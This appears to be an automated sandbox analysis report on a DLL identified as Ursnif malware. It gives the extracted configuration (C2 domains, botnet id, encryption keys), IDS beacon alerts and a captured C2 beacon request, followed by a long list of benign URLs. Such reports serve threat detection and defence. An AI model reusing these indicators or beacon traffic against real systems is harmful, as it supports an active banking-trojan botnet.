Windows Analysis Report 60e40fb428612.dll

AV Detection:

Found malware configuration

Source: 00000006.00000003.317332406.0000000003560000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"RSA Public Key": "ovNAU+HRorLZmwnDvbYFDY7UA+FTIAnF2uJSQd0M+N3ep6CVEhoDrEXACstP09QHK7cBl9nMAaFI1as0K4aXOQKngdScIQbDa3MQ98Ce9MYRMvxGUI05fSIRRFzMYffOXQr97vVUUUPjsYgfkDWS2eKPxSe5dz/pF0mjA0T8ibOLzHmVMs4vVv+nwVAw0xpD", "c2_domain": ["outlook.com", "auredosite.club", "vuredosite.club"], "botnet": "8877", "server": "12", "serpent_key": "30218409ILPAJDUR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Compliance:

Uses 32bit PE files

Source: 60e40fb428612.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Uses new MSVCR Dlls

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: 60e40fb428612.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Source:

Binary string: c:\393_Molecule\skin\depend\supply\Thick\Drive.pdb source: loaddll32.exe, 00000000.00000002.476685729.000000006E234000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.477751077.000000006E234000.00000002.00020000.sdmp, 60e40fb428612.dll

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49732 -> 40.97.116.82:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49732 -> 40.97.116.82:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49755 -> 37.120.222.6:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49755 -> 37.120.222.6:80

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 40.101.18.18 40.101.18.18
Source: Joe Sandbox View	IP Address: 40.97.116.82 40.97.116.82

Downloads files from webservers via HTTP

Source: global traffic

HTTP traffic detected: GET /grower/v6VaX2L98iQ9vNPqP6I1/s7YQ5JAQQXN9djD_2BP/oxHIXx6SfkQXQHWk5gYign/kG_2FSXB9uJKM/uw7wyHm_/2Bzvrq8q92GB9q04QVkch60/s8xolTUIEl/JiLJJpnHLtn3GR9k1/2H8tNCG7sbZq/z7aUK7NADvh/BA6FMpxvpSV9V3/bnPW_2FsZW9JkMS_2Bt_2/FS0OhP_2Bi7_2Fs_/2BndfgWaKsB4v7f/IedJmZ8N1/uc.grow HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: outlook.comConnection: Keep-Alive

Found strings which match to known social media urls

Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: msapplication.xml0.22.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x75ae7464,0x01d7728a</date><accdate>0x75ae7464,0x01d7728a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.22.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x75ae7464,0x01d7728a</date><accdate>0x75ae7464,0x01d7728a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.22.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x75b61584,0x01d7728a</date><accdate>0x75b61584,0x01d7728a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.22.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x75b61584,0x01d7728a</date><accdate>0x75b61584,0x01d7728a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.22.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x75b61584,0x01d7728a</date><accdate>0x75b61584,0x01d7728a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.22.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x75b61584,0x01d7728a</date><accdate>0x75b61584,0x01d7728a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: outlook.com

URLs found in memory or binary data

Source: iexplore.exe, 0000001E.00000002.478655317.000001D554DB0000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: iexplore.exe, 0000001E.00000002.478655317.000001D554DB0000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: iexplore.exe, 0000001E.00000002.480305506.000001D5557D6000.00000004.00000001.sdmp	String found in binary or memory: http://outlook.com/grower/v6VaX2L98iQ9vNPqP6I1/s7YQ5JAQQXN9djD_2BP/oxHIXx6SfkQXQHWk5gYign/kG_2FSXB9u
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
